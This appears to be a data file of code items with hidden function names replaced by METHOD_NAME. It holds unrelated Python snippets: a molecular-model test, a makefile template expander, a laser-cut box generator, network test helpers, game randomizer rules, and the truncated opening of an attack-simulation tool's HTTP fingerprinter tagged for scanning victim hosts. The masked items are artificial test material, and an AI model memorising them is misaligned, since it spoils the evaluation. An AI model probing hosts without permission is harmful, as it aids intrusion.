    jdata["training"]["validation_data"]["systems"] = data_file
    # Exercise the type_one_side + exclude_types descriptor combination.
    jdata["model"]["descriptor"]["type_one_side"] = True
    jdata["model"]["descriptor"]["exclude_types"] = [[0, 0]]
    with open(INPUT, "w") as fp:
        json.dump(jdata, fp, indent=4)

    ret = run_dp("dp train " + INPUT)
    np.testing.assert_equal(ret, 0, "DP train failed!")
    ret = run_dp("dp freeze -o " + frozen_model)
    np.testing.assert_equal(ret, 0, "DP freeze failed!")
    ret = run_dp("dp compress " + " -i " + frozen_model + " -o " + compressed_model)
    np.testing.assert_equal(ret, 0, "DP model compression failed!")
    return INPUT, frozen_model, compressed_model
INPUT, FROZEN_MODEL, COMPRESSED_MODEL = _init_models()
class TestDeepPotAPBCTypeOneSideExcludeTypes(unittest.TestCase):
    """Check that the compressed model reproduces the original model's
    energies, forces, and virials for a small periodic system."""
    @classmethod
    def setUpClass(self):
        """Load both models once and define a shared 6-atom periodic system."""
        # NOTE(review): this parameter is conventionally named `cls`; it is
        # bound to the class here, so the assignments are class attributes.
        self.dp_original = DeepPot(FROZEN_MODEL)
        self.dp_compressed = DeepPot(COMPRESSED_MODEL)
        # Flattened xyz coordinates of 6 atoms (two O-H-H groups per atype).
        self.coords = np.array(
            [
                12.83,
                2.56,
                2.18,
                12.09,
                2.87,
                2.74,
                00.25,
                3.32,
                1.68,
                3.36,
                3.00,
                1.81,
                3.51,
                2.51,
                2.60,
                4.27,
                3.22,
                1.56,
            ]
        )
        # Type indices: 0 = O, 1 = H (matches the type map asserted below).
        self.atype = [0, 1, 1, 0, 1, 1]
        # Cubic 13 Angstrom periodic box (row-major 3x3).
        self.box = np.array([13.0, 0.0, 0.0, 0.0, 13.0, 0.0, 0.0, 0.0, 13.0])
    def test_attrs(self):
        """Model metadata must survive compression unchanged."""
        self.assertEqual(self.dp_original.get_ntypes(), 2)
        self.assertAlmostEqual(self.dp_original.get_rcut(), 6.0, places=default_places)
        self.assertEqual(self.dp_original.get_type_map(), ["O", "H"])
        self.assertEqual(self.dp_original.get_dim_fparam(), 0)
        self.assertEqual(self.dp_original.get_dim_aparam(), 0)
        self.assertEqual(self.dp_compressed.get_ntypes(), 2)
        self.assertAlmostEqual(
            self.dp_compressed.get_rcut(), 6.0, places=default_places
        )
        self.assertEqual(self.dp_compressed.get_type_map(), ["O", "H"])
        self.assertEqual(self.dp_compressed.get_dim_fparam(), 0)
        self.assertEqual(self.dp_compressed.get_dim_aparam(), 0)
    def test_1frame(self):
        """Single frame, no per-atom output: shapes and values must agree."""
        ee0, ff0, vv0 = self.dp_original.eval(
            self.coords, self.box, self.atype, atomic=False
        )
        ee1, ff1, vv1 = self.dp_compressed.eval(
            self.coords, self.box, self.atype, atomic=False
        )
        # check shape of the returns
        nframes = 1
        natoms = len(self.atype)
        self.assertEqual(ee0.shape, (nframes, 1))
        self.assertEqual(ff0.shape, (nframes, natoms, 3))
        self.assertEqual(vv0.shape, (nframes, 9))
        self.assertEqual(ee1.shape, (nframes, 1))
        self.assertEqual(ff1.shape, (nframes, natoms, 3))
        self.assertEqual(vv1.shape, (nframes, 9))
        # check values
        np.testing.assert_almost_equal(ff0, ff1, default_places)
        np.testing.assert_almost_equal(ee0, ee1, default_places)
        np.testing.assert_almost_equal(vv0, vv1, default_places)
    def test_1frame_atm(self):
        """Single frame with per-atom energies and virials."""
        ee0, ff0, vv0, ae0, av0 = self.dp_original.eval(
            self.coords, self.box, self.atype, atomic=True
        )
        ee1, ff1, vv1, ae1, av1 = self.dp_compressed.eval(
            self.coords, self.box, self.atype, atomic=True
        )
        # check shape of the returns
        nframes = 1
        natoms = len(self.atype)
        self.assertEqual(ee0.shape, (nframes, 1))
        self.assertEqual(ff0.shape, (nframes, natoms, 3))
        self.assertEqual(vv0.shape, (nframes, 9))
        self.assertEqual(ae0.shape, (nframes, natoms, 1))
        self.assertEqual(av0.shape, (nframes, natoms, 9))
        self.assertEqual(ee1.shape, (nframes, 1))
        self.assertEqual(ff1.shape, (nframes, natoms, 3))
        self.assertEqual(vv1.shape, (nframes, 9))
        self.assertEqual(ae1.shape, (nframes, natoms, 1))
        self.assertEqual(av1.shape, (nframes, natoms, 9))
        # check values
        np.testing.assert_almost_equal(ff0, ff1, default_places)
        np.testing.assert_almost_equal(ae0, ae1, default_places)
        np.testing.assert_almost_equal(av0, av1, default_places)
        np.testing.assert_almost_equal(ee0, ee1, default_places)
        np.testing.assert_almost_equal(vv0, vv1, default_places)
    def test_2frame_atm(self):
        """Two identical frames: batching must not change results."""
        coords2 = np.concatenate((self.coords, self.coords))
        box2 = np.concatenate((self.box, self.box))
        ee0, ff0, vv0, ae0, av0 = self.dp_original.eval(
            coords2, box2, self.atype, atomic=True
        )
        ee1, ff1, vv1, ae1, av1 = self.dp_compressed.eval(
            coords2, box2, self.atype, atomic=True
        )
        # check shape of the returns
        nframes = 2
        natoms = len(self.atype)
        self.assertEqual(ee0.shape, (nframes, 1))
        self.assertEqual(ff0.shape, (nframes, natoms, 3))
        self.assertEqual(vv0.shape, (nframes, 9))
        self.assertEqual(ae0.shape, (nframes, natoms, 1))
        self.assertEqual(av0.shape, (nframes, natoms, 9))
        self.assertEqual(ee1.shape, (nframes, 1))
        self.assertEqual(ff1.shape, (nframes, natoms, 3))
        self.assertEqual(vv1.shape, (nframes, 9))
        self.assertEqual(ae1.shape, (nframes, natoms, 1))
        self.assertEqual(av1.shape, (nframes, natoms, 9))
        # check values
        np.testing.assert_almost_equal(ff0, ff1, default_places)
        np.testing.assert_almost_equal(ae0, ae1, default_places)
        np.testing.assert_almost_equal(av0, av1, default_places)
        np.testing.assert_almost_equal(ee0, ee1, default_places)
        np.testing.assert_almost_equal(vv0, vv1, default_places)
298,442 | match globs | #! /usr/bin/env python3
"""Minimal macro processor. Used for generating VC++ makefiles.
The available template commands are:
Expand a template section for each file in a list of file patterns::
###MAKTEMPLATE:FOREACH my/path*/*.cxx,other*.cxx
...
###MAKTEMPLATE:ENDFOREACH
In the template section, you can use `###BASENAME###` to get the base name
of the file being processed (e.g. "base" for "../base.cxx"), and you can
use `###FILENAME###` to get the full filename.
Copyright (c) 2000-2022, Bart Samwel and Jeroen T. Vermeulen.
"""
from __future__ import (
absolute_import,
print_function,
unicode_literals,
)
from argparse import (
ArgumentError,
ArgumentParser,
RawDescriptionHelpFormatter,
)
from contextlib import contextmanager
from glob import glob
import os
from sys import (
argv,
stdin,
stderr,
stdout,
)
import sys
from textwrap import dedent
def expand_foreach_file(path, block, outfile):
    """Write one expansion of *block* to *outfile* for a single file *path*.

    ###FILENAME### is replaced with the full path, ###BASENAME### with the
    file's base name minus its extension.
    """
    base = os.path.splitext(os.path.basename(path))[0]
    for template_line in block:
        expanded = template_line.replace("###FILENAME###", path)
        outfile.write(expanded.replace("###BASENAME###", base))
def METHOD_NAME(globs):
    """Return a sorted list of all files matching any pattern in *globs*.

    Duplicates (a file matched by several patterns) appear only once.
    """
    matches = set()
    for pattern in globs:
        matches.update(glob(pattern))
    return sorted(matches)
def expand_foreach(globs, block, outfile):
    """Expand *block* once for every file matching any pattern in *globs*,
    writing the results to *outfile*."""
    # Freeze the block up front: it may be a one-shot generator, but we
    # iterate it once per matched file.
    frozen = tuple(block)
    for matched_path in METHOD_NAME(globs):
        expand_foreach_file(matched_path, frozen, outfile)
# Header to be prefixed to the generated file.
OUTPUT_HEADER = dedent("""\
# AUTOMATICALLY GENERATED FILE -- DO NOT EDIT.
#
# This file is generated automatically by libpqxx's {script} script, and
# will be rewritten from time to time.
#
# If you modify this file, chances are your modifications will be lost.
#
# The {script} script should be available in the tools directory of the
# libpqxx source archive.
""")
foreach_marker = r"###MAKTEMPLATE:FOREACH "
end_foreach_marker = r"###MAKTEMPLATE:ENDFOREACH"
def parse_foreach(line):
    """Parse FOREACH directive, if line contains one.

    :param line: One line of template input.
    :return: A list of FOREACH globs, or None if this was not a FOREACH line.
    """
    stripped = line.strip()
    if not stripped.startswith(foreach_marker):
        return None
    return stripped[len(foreach_marker):].split(',')
def read_foreach_block(infile):
    """Yield the lines of a FOREACH block from *infile*.

    Assumes the FOREACH directive was on the preceding line.  The closing
    ENDFOREACH line is consumed but not yielded.
    """
    for raw_line in infile:
        if raw_line.strip().startswith(end_foreach_marker):
            break
        yield raw_line
def expand_template(infile, outfile):
    """Expand the template in infile, and write the results to outfile.

    Lines outside FOREACH blocks are copied verbatim; each FOREACH block is
    expanded once per file matching its glob list.
    """
    for line in infile:
        globs = parse_foreach(line)
        if globs is None:
            # Not a FOREACH line. Copy to output.
            outfile.write(line)
        else:
            block = read_foreach_block(infile)
            expand_foreach(globs, block, outfile)
@contextmanager
def open_stream(path=None, default=None, mode='r'):
    """Yield ``open(path, mode)``, or *default* when *path* is None.

    A file opened here is closed on exit.  *default* must be an already-open
    stream; it is never closed by this context manager.
    """
    if path is not None:
        with open(path, mode) as stream:
            yield stream
    else:
        yield default
def parse_args():
    """Parse command-line arguments.

    On bad usage argparse prints an error and exits (SystemExit).

    :return: Tuple of: input path (or None for stdin), output path (or None
    for stdout).
    """
    parser = ArgumentParser(
        description=__doc__, formatter_class=RawDescriptionHelpFormatter)
    parser.add_argument(
        'template', nargs='?',
        help="Input template. Defaults to standard input.")
    parser.add_argument(
        'output', nargs='?',
        help="Output file. Defaults to standard output.")
    args = parser.parse_args()
    return args.template, args.output
def write_header(stream, template_path=None):
    """Write the do-not-edit header to *stream*.

    :param stream: output stream to write the header to.
    :param template_path: when given, named in the header as the template
        the output was generated from.
    """
    hr = ('# ' + '#' * 78) + "\n"
    script = os.path.basename(argv[0])
    # BUG FIX: this function previously wrote to the module-level name
    # 'outstream' (bound only inside the __main__ block) instead of its
    # 'stream' parameter, so it only worked by accident when called from
    # __main__ and failed with NameError anywhere else.
    stream.write(hr)
    stream.write(OUTPUT_HEADER.format(script=script))
    if template_path is not None:
        stream.write("#\n")
        stream.write("# Generated from template '%s'.\n" % template_path)
    stream.write(hr)
if __name__ == '__main__':
    try:
        template_path, output_path = parse_args()
    except ArgumentError as error:
        stderr.write('%s\n' % error)
        sys.exit(2)
    # Fall back to stdin/stdout when the respective path was not given.
    input_stream = open_stream(template_path, stdin, 'r')
    output_stream = open_stream(output_path, stdout, 'w')
    with input_stream as instream, output_stream as outstream:
        write_header(outstream, template_path)
        expand_template(instream, outstream)
298,443 | support wall | #!/usr/bin/env python3
# Copyright (C) 2013-2019 Florian Festi
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from boxes import *
from boxes.walledges import _WallMountedBox
class PinEdge(edges.BaseEdge):
    # Edge drawing a row of outward pointing pins with rounded tips.  The
    # generator itself is passed in as the settings object, so pinwidth,
    # pinlength, pinspacing, etc. are its command-line parameters.
    def __call__(self, length, **kw):
        """Draw the pin edge; spacing is settings-driven, *length* is unused."""
        w2 = self.settings.pinwidth/2
        l = self.settings.pinlength
        s = self.settings.pinspacing
        inc = self.settings.pinspacing_increment
        t = self.settings.thickness
        # Outline of one pin: out, half-circle tip of radius w2, back in.
        pin = [0, -90, l+t-w2, (180, w2), l+t-w2, -90]
        self.edge(s/2-w2)
        s += inc/2
        # NOTE(review): self.pins appears to resolve to the generator's
        # --pins argument via BaseEdge's settings delegation -- confirm.
        for i in range(self.pins-1):
            self.polyline(*pin, s-2*w2)
            s+=inc
        self.polyline(*pin, s/2-w2-inc/4)
    def margin(self) -> float:
        """Extra space needed beyond the edge line: pin length plus material."""
        return self.settings.thickness+self.settings.pinlength
class WallPinRow(_WallMountedBox):
    """Outset and angled plate to mount stuff to"""
    def __init__(self) -> None:
        super().__init__()
        self.argparser.add_argument(
            "--pins", action="store", type=int, default=8,
            help="number of pins")
        self.argparser.add_argument(
            "--pinlength", action="store", type=float, default=35,
            help="length of pins (in mm)")
        self.argparser.add_argument(
            "--pinwidth", action="store", type=float, default=10,
            help="width of pins (in mm)")
        self.argparser.add_argument(
            "--pinspacing", action="store", type=float, default=35,
            help="space from middle to middle of pins (in mm)")
        self.argparser.add_argument(
            "--pinspacing_increment", action="store", type=float, default=0.0,
            help="increase spacing from left to right (in mm)")
        self.argparser.add_argument(
            "--angle", action="store", type=float, default=20.0,
            help="angle of the pins pointing up (in degrees)")
        self.argparser.add_argument(
            "--hooks", action="store", type=int, default=3,
            help="number of hooks into the wall")
        self.argparser.add_argument(
            "--h", action="store", type=float, default=50.0,
            help="height of the front plate (in mm) - needs to be at least 7 time the thickness")
    def frontCB(self):
        """Callback for the front plate: slots for the pin plate and finger
        holes for the inner support walls."""
        s = self.pinspacing
        inc = self.pinspacing_increment
        t = self.thickness
        pos = s/2
        s += 0.5*inc
        # One mounting slot per pin; spacing grows by inc per step.
        for i in range(self.pins):
            self.rectangularHole(pos, 2*t, self.pinwidth, t)
            pos += s
            s+=inc
        for i in range(1, self.hooks-1):
            self.fingerHolesAt(i*self.x/(self.hooks-1), self.h/2, self.h/2)
    def backCB(self):
        """Callback for the back plate: hole row for the pin plate and, when
        angled, holes for the inner support walls."""
        t = self.thickness
        self.fingerHolesAt(0, 2*t, self.x, 0)
        # Straight (unangled) variant needs no extra support holes.
        if self.angle < 0.001:
            return
        for i in range(1, self.hooks-1):
            self.fingerHolesAt(i*self.x/(self.hooks-1), 3*t, self.h/2-3*t)
    def sideWall(self, move=None):
        """Draw one outer side wall carrying the wall-mount ("a") edge."""
        a = self.angle
        ar = math.radians(a)
        h = self.h
        t = self.thickness
        # Part bounding box, including the wall-edge margin.
        sh = math.sin(ar)*6*t + math.cos(ar)*h
        tw = self.edges["a"].margin() + math.sin(ar)*h + math.cos(ar)*6*t
        th = sh + 6
        if self.move(tw, th, move, True):
            return
        self.moveTo(self.edges["a"].margin())
        self.polyline(math.sin(ar)*h, a, 4*t)
        self.fingerHolesAt(-3.5*t, 0, h/2, 90)
        self.edgeCorner("e", "h")
        self.edges["h"](h)
        self.polyline(0, 90-a, math.cos(ar)*6*t, 90)
        self.edges["a"](sh)
        self.corner(90)
        self.move(tw, th, move)
    def METHOD_NAME(self, move=None):
        """Draw one inner support wall placed between the outer side walls."""
        a = self.angle
        ar = math.radians(a)
        h = self.h
        t = self.thickness
        sh = math.sin(ar)*6*t + math.cos(ar)*h
        tw = self.edges["a"].margin() + max(
            math.sin(ar)*h/2 + math.cos(ar)*5*t,
            math.sin(ar)*h)
        th = sh + 6
        if self.move(tw, th, move, True):
            return
        self.moveTo(self.edges["a"].margin())
        # Extra angled segment only exists in the tilted variant.
        if a > 0.001:
            self.polyline(math.sin(ar)*h, a+90, 3*t)
            self.edges["f"](h/2-3*t)
            self.polyline(0, -90)
        self.polyline(4*t, 90)
        self.edges["f"](h/2)
        self.polyline(math.sin(ar)*2*t, 90-a,
                      math.cos(ar)*4*t - math.sin(ar)**2*2*t, 90)
        if a > 0.001:
            self.edges["a"](sh)
        else:
            self.edges["a"](h/2)
        self.corner(90)
        self.move(tw, th, move)
    def render(self):
        """Emit all parts: pin plate, front plate, back plate, and walls."""
        self.generateWallEdges()
        p = PinEdge(self, self)
        n = self.pins
        t = self.thickness
        # Enforce the documented minimum front-plate height.
        if self.h < 7*t:
            self.h = 7*t
        # Total width: arithmetic series when pinspacing_increment is set.
        self.x = x = n*self.pinspacing + (n)*(n-1)/2 *self.pinspacing_increment
        self.rectangularWall(x, 3*t, [p, "e", "f", "e"], move="up")
        self.rectangularWall(x, self.h, "efef", callback=[self.frontCB],
                             move="up")
        self.rectangularWall(x, self.h/2, "efef", callback=[self.backCB],
                             move="up")
        self.sideWall(move="right")
        for i in range(self.hooks-2):
            self.METHOD_NAME(move="right")
        self.sideWall(move="right")
298,444 | free network | import errno
import os
import platform
import pwd
import re
import stat
import subprocess
import sys
import uuid
from socket import AF_INET, AF_INET6
import netaddr
import pytest
from pyroute2 import config
from pyroute2.iproute.linux import IPRoute
try:
import httplib
except ImportError:
import http.client as httplib
# Identity of this test run, handed to the dtcd when requesting networks.
dtcd_uuid = str(uuid.uuid4())
# check the dtcd: probe whether a daemon is listening locally; if so,
# network allocation is delegated to it.
try:
    cx = httplib.HTTPConnection('localhost:7623')
    cx.request('GET', '/v1/network/')
    cx.getresponse()
    has_dtcd = True
except Exception:
    # FIX: was a bare `except:`, which also swallowed KeyboardInterrupt and
    # SystemExit at import time.  Any ordinary failure just means the dtcd
    # is unavailable.
    has_dtcd = False
# Address space the local fallback allocator hands out subnets from.
supernet = {
    AF_INET: netaddr.IPNetwork('172.16.0.0/12'),
    AF_INET6: netaddr.IPNetwork('fdb3:84e5:4ff4::/48'),
}
# Pools of unused subnets (IPv4 /24s, IPv6 /64s) for local allocation.
network_pool = {
    AF_INET: list(supernet[AF_INET].subnet(24)),
    AF_INET6: list(supernet[AF_INET6].subnet(64)),
}
# Subnets currently handed out by the local allocator.
allocations = {}
family_url = {AF_INET: 'ipv4', AF_INET6: 'ipv6'}
def allocate_network(family=AF_INET):
    """Allocate a test subnet for *family*, via the dtcd when available.

    Tries the local dtcd HTTP API first; on any failure (or non-200 answer)
    falls back to popping a subnet from the module-level pool and recording
    it in ``allocations``.

    :return: a netaddr.IPNetwork
    """
    global dtcd_uuid
    global network_pool
    global allocations
    network = None
    try:
        cx = httplib.HTTPConnection('localhost:7623')
        # POST our run uuid so the daemon can track ownership.
        cx.request(
            'POST', '/v1/network/%s/' % family_url[family], body=dtcd_uuid
        )
        resp = cx.getresponse()
        if resp.status == 200:
            network = netaddr.IPNetwork(resp.read().decode('utf-8'))
        cx.close()
    except Exception:
        # Daemon unreachable or misbehaving -- use the local pool below.
        pass
    if network is None:
        network = network_pool[family].pop()
        allocations[network] = True
    return network
def METHOD_NAME(network, family=AF_INET):
    """Return *network* to wherever it was allocated from.

    Locally-allocated networks go back into ``network_pool``; anything else
    is assumed to be dtcd-owned and released through its HTTP API.

    NOTE(review): unlike allocate_network(), the HTTP branch here is not
    guarded by try/except, so a vanished daemon raises -- confirm intended.
    """
    global network_pool
    global allocations
    if network in allocations:
        allocations.pop(network)
        network_pool[family].append(network)
    else:
        cx = httplib.HTTPConnection('localhost:7623')
        cx.request(
            'DELETE', '/v1/network/%s/' % family_url[family], body=str(network)
        )
        cx.getresponse()
        cx.close()
def conflict_arch(arch):
    """Skip the running test when the machine architecture matches *arch*."""
    if platform.machine().find(arch) >= 0:
        pytest.skip('conflict with architecture %s' % (arch))
def kernel_version_ge(major, minor):
    """Return True when the running kernel is at least *major*.*minor*.

    *minor* may be None (or 0) to compare the major version only.
    """
    # True if running kernel is >= X.Y
    if config.kernel[0] > major:
        return True
    if config.kernel[0] < major:
        return False
    if minor and config.kernel[1] < minor:
        return False
    return True
def require_kernel(major, minor=None):
    """Skip the running test unless the kernel is at least *major*.*minor*."""
    if not kernel_version_ge(major, minor):
        pytest.skip('incompatible kernel version')
def require_python(target):
    """Skip the running test unless the Python major version equals *target*."""
    if sys.version_info[0] != target:
        pytest.skip('test requires Python %i' % target)
def require_8021q():
    """Skip the running test unless the 8021q (VLAN) kernel module is loaded."""
    try:
        os.stat('/proc/net/vlan/config')
    except OSError as e:
        # errno 2 'No such file or directory'
        if e.errno == 2:
            pytest.skip('missing 8021q support, or module is not loaded')
        raise
def require_bridge():
    """Skip the running test when a bridge interface cannot be created.

    A throwaway interface 'test_req' is created and deleted as the probe.
    """
    with IPRoute() as ip:
        try:
            ip.link('add', ifname='test_req', kind='bridge')
        except Exception:
            pytest.skip('can not create <bridge>')
        idx = ip.link_lookup(ifname='test_req')
        if not idx:
            pytest.skip('can not create <bridge>')
        ip.link('del', index=idx)
def require_bond():
    """Skip the running test when a bond interface cannot be created."""
    with IPRoute() as ip:
        try:
            ip.link('add', ifname='test_req', kind='bond')
        except Exception:
            pytest.skip('can not create <bond>')
        idx = ip.link_lookup(ifname='test_req')
        if not idx:
            pytest.skip('can not create <bond>')
        ip.link('del', index=idx)
def require_user(user):
    """Skip the running test unless executed as *user* (and read-only test
    mode is not requested via PYROUTE2_TESTS_RO)."""
    if bool(os.environ.get('PYROUTE2_TESTS_RO', False)):
        pytest.skip('read-only tests requested')
    if pwd.getpwuid(os.getuid()).pw_name != user:
        pytest.skip('required user %s' % (user))
def require_executable(name):
    """Skip the running test unless *name* is found on PATH (via `which`)."""
    try:
        with open(os.devnull, 'w') as fnull:
            subprocess.check_call(['which', name], stdout=fnull, stderr=fnull)
    except Exception:
        pytest.skip('required %s not found' % (name))
def remove_link(name):
    """Delete network interface *name* (no-op when not root) and wait until
    it disappears from `ip link`.

    NOTE(review): the wait loop busy-polls with no sleep or timeout; if the
    delete fails silently this never returns -- confirm acceptable.
    """
    if os.getuid() != 0:
        return
    with open(os.devnull, 'w') as fnull:
        subprocess.call(
            ['ip', 'link', 'del', 'dev', name], stdout=fnull, stderr=fnull
        )
    while True:
        links = get_ip_link()
        if name not in links:
            break
def create_link(name, kind):
    """Create interface *name* of type *kind* (no-op when not root); raise
    when it has not appeared after 20 polls.

    NOTE(review): the poll loop has no sleep, so all 20 checks happen almost
    instantly -- confirm intended.
    """
    if os.getuid() != 0:
        return
    subprocess.call(['ip', 'link', 'add', 'dev', name, 'type', kind])
    for i in range(20):
        links = get_ip_link()
        if name in links:
            return
    raise Exception("interface not created")
def _check_output(*argv):
# we can not use check_output, as it does not exist in 2.6
process = subprocess.Popen(argv, stdout=subprocess.PIPE)
ret = process.communicate()
return ret[0].decode('utf-8').split('\n')
def grep(command, pattern=None):
    """Run *command* (a whitespace-separated string) and return the lines of
    its output matching the regular expression *pattern*."""
    matcher = re.compile(pattern)
    return [line for line in _check_output(*command.split()) if matcher.search(line)]
def get_ip_addr(interface=None):
    """Return inet/inet6 addresses (CIDR strings) parsed from ``ip -o ad``,
    optionally limited to *interface*."""
    argv = ['ip', '-o', 'ad']
    if interface:
        argv.extend(['li', 'dev', interface])
    out = _check_output(*argv)
    ret = []
    for string in out:
        fields = string.split()
        # field 2 is the family ('inet'/'inet6'), field 3 the address.
        if len(fields) >= 5 and fields[2][:4] == 'inet':
            ret.append(fields[3])
    return ret
def get_ip_brd(interface=None):
    """Return broadcast addresses parsed from ``ip -o ad``, optionally
    limited to *interface*."""
    argv = ['ip', '-o', 'ad']
    if interface:
        argv.extend(['li', 'dev', interface])
    out = _check_output(*argv)
    ret = []
    for string in out:
        fields = string.split()
        if len(fields) >= 5 and fields[4] == 'brd':
            ret.append(fields[5])
    return ret
def get_ip_link():
    """Return interface names from ``ip -o li`` (VLAN '@parent' suffix and
    trailing colon stripped)."""
    ret = []
    out = _check_output('ip', '-o', 'li')
    for string in out:
        fields = string.split()
        if len(fields) >= 2:
            ret.append(fields[1][:-1].split('@')[0])
    return ret
def get_ip_default_routes():
    """Return the lines of ``ip -4 ro`` describing default routes."""
    ret = []
    out = _check_output('ip', '-4', 'ro')
    for string in out:
        if 'default' in string:
            ret.append(string)
    return ret
def get_ip_rules(proto='-4'):
    """Return the non-empty lines of ``ip <proto> rule show``."""
    ret = []
    out = _check_output('ip', proto, 'rule', 'show')
    for string in out:
        if len(string):
            ret.append(string)
    return ret
def count_socket_fds():
    """Return how many of this process's open file descriptors are sockets."""
    fd_dir = '/proc/%s/fd' % os.getpid()
    count = 0
    for entry in os.listdir(fd_dir):
        try:
            mode = os.stat(os.path.join(fd_dir, entry)).st_mode
        except OSError as err:
            # fds can vanish between listdir() and stat(); anything else
            # is a real error.
            if err.errno != errno.ENOENT:
                raise
            continue
        if stat.S_ISSOCK(mode):
            count += 1
    return count
298,445 | set rules |
from BaseClasses import MultiWorld
from .Items import exclusionItem_table
from .Locations import STT_Checks, exclusion_table
from .Names import LocationName, ItemName
from ..generic.Rules import add_rule, forbid_items, set_rule
def METHOD_NAME(world: MultiWorld, player: int):
    """Install access rules and the completion condition for a KH2 player.

    Covers data-organization boss checks, weapon-slot items, drive-form
    level gating, the three possible goals, and item bans on locations the
    game client cannot handle.
    """
    # Data-organization fights gate their reward locations.
    add_rule(world.get_location(LocationName.RoxasDataMagicBoost, player),
             lambda state: state.kh_dataroxas(player))
    add_rule(world.get_location(LocationName.DemyxDataAPBoost, player),
             lambda state: state.kh_datademyx(player))
    add_rule(world.get_location(LocationName.SaixDataDefenseBoost, player),
             lambda state: state.kh_datasaix(player))
    add_rule(world.get_location(LocationName.XaldinDataDefenseBoost, player),
             lambda state: state.kh_dataxaldin(player))
    add_rule(world.get_location(LocationName.XemnasDataPowerBoost, player),
             lambda state: state.kh_dataxemnas(player))
    add_rule(world.get_location(LocationName.XigbarDataDefenseBoost, player),
             lambda state: state.kh_dataxigbar(player))
    add_rule(world.get_location(LocationName.VexenDataLostIllusion, player),
             lambda state: state.kh_dataaxel(player))
    add_rule(world.get_location(LocationName.LuxordDataAPBoost, player),
             lambda state: state.kh_dataluxord(player))
    for slot, weapon in exclusion_table["WeaponSlots"].items():
        # BUG FIX: bind `weapon` per iteration.  The previous plain closure
        # late-bound the loop variable, so every weapon slot ended up
        # requiring the *last* weapon in the table.
        add_rule(world.get_location(slot, player),
                 lambda state, weapon=weapon: state.has(weapon, player))
    # Locations unlocked by each drive form's level, 4 through 7.
    formLogicTable = {
        ItemName.ValorForm: [LocationName.Valorlvl4,
                             LocationName.Valorlvl5,
                             LocationName.Valorlvl6,
                             LocationName.Valorlvl7],
        ItemName.WisdomForm: [LocationName.Wisdomlvl4,
                              LocationName.Wisdomlvl5,
                              LocationName.Wisdomlvl6,
                              LocationName.Wisdomlvl7],
        ItemName.LimitForm: [LocationName.Limitlvl4,
                             LocationName.Limitlvl5,
                             LocationName.Limitlvl6,
                             LocationName.Limitlvl7],
        ItemName.MasterForm: [LocationName.Masterlvl4,
                              LocationName.Masterlvl5,
                              LocationName.Masterlvl6,
                              LocationName.Masterlvl7],
        ItemName.FinalForm: [LocationName.Finallvl4,
                             LocationName.Finallvl5,
                             LocationName.Finallvl6,
                             LocationName.Finallvl7]
    }
    for form in formLogicTable:
        for i in range(4):
            location = world.get_location(formLogicTable[form][i], player)
            # `i` and `form` are rebound as defaults to avoid the same
            # late-binding pitfall fixed above.
            set_rule(location, lambda state, i=i + 1, form=form: state.kh_amount_of_forms(player, i, form))
    if world.Goal[player] == "three_proofs":
        add_rule(world.get_location(LocationName.FinalXemnas, player),
                 lambda state: state.kh_three_proof_unlocked(player))
        if world.FinalXemnas[player]:
            world.completion_condition[player] = lambda state: state.kh_victory(player)
        else:
            world.completion_condition[player] = lambda state: state.kh_three_proof_unlocked(player)
    # lucky emblem hunt
    elif world.Goal[player] == "lucky_emblem_hunt":
        add_rule(world.get_location(LocationName.FinalXemnas, player),
                 lambda state: state.kh_lucky_emblem_unlocked(player, world.LuckyEmblemsRequired[player].value))
        if world.FinalXemnas[player]:
            world.completion_condition[player] = lambda state: state.kh_victory(player)
        else:
            world.completion_condition[player] = lambda state: state.kh_lucky_emblem_unlocked(player, world.LuckyEmblemsRequired[player].value)
    # hitlist if == 2
    else:
        add_rule(world.get_location(LocationName.FinalXemnas, player),
                 lambda state: state.kh_hitlist(player, world.BountyRequired[player].value))
        if world.FinalXemnas[player]:
            world.completion_condition[player] = lambda state: state.kh_victory(player)
        else:
            world.completion_condition[player] = lambda state: state.kh_hitlist(player, world.BountyRequired[player].value)
    # Forbid Abilities on popups due to game limitations
    for location in exclusion_table["Popups"]:
        forbid_items(world.get_location(location, player), exclusionItem_table["Ability"])
        forbid_items(world.get_location(location, player), exclusionItem_table["StatUps"])
    for location in STT_Checks:
        forbid_items(world.get_location(location, player), exclusionItem_table["StatUps"])
    # Santa's house also breaks with stat ups
    for location in {LocationName.SantasHouseChristmasTownMap, LocationName.SantasHouseAPBoost}:
        forbid_items(world.get_location(location, player), exclusionItem_table["StatUps"])
    add_rule(world.get_location(LocationName.TransporttoRemembrance, player),
             lambda state: state.kh_transport(player))
298,446 | get host fingerprint | import logging
import time
from contextlib import closing
from http import HTTPMethod
from ipaddress import IPv4Address
from typing import Dict, Optional, Sequence, Set
from requests import head
from requests.exceptions import ConnectionError, Timeout
from requests.structures import CaseInsensitiveDict
from common.agent_events import FingerprintingEvent, HTTPRequestEvent
from common.event_queue import IAgentEventPublisher
from common.tags import ACTIVE_SCANNING_T1595_TAG, GATHER_VICTIM_HOST_INFORMATION_T1592_TAG
from common.types import (
AgentID,
DiscoveredService,
NetworkPort,
NetworkProtocol,
NetworkService,
PortStatus,
)
from infection_monkey.i_puppet import FingerprintData, IFingerprinter, PingScanData, PortScanData
logger = logging.getLogger(__name__)
# Identifier this fingerprinter attaches to every event it publishes.
HTTP_FINGERPRINTER_TAG = "http-fingerprinter"
# Full tag set (fingerprinter id plus technique tags) for published events.
EVENT_TAGS = frozenset(
    {HTTP_FINGERPRINTER_TAG, ACTIVE_SCANNING_T1595_TAG, GATHER_VICTIM_HOST_INFORMATION_T1592_TAG}
)
class HTTPFingerprinter(IFingerprinter):
    """
    Queries potential HTTP(S) ports and attempt to determine the server software that handles the
    HTTP requests.
    """
    def __init__(self, agent_id: AgentID, agent_event_publisher: IAgentEventPublisher):
        self._agent_id = agent_id
        self._agent_event_publisher = agent_event_publisher
    def METHOD_NAME(
        self,
        host: str,
        _: PingScanData,
        port_scan_data: Dict[int, PortScanData],
        options: Dict,
    ) -> FingerprintData:
        """Probe *host*'s open HTTP ports and report the discovered services.

        Only ports that are both open and listed in options["http_ports"]
        are probed.  os_type/os_version of the result are always None: this
        fingerprinter identifies services, not operating systems.
        """
        services = []
        http_ports = set(options.get("http_ports", []))
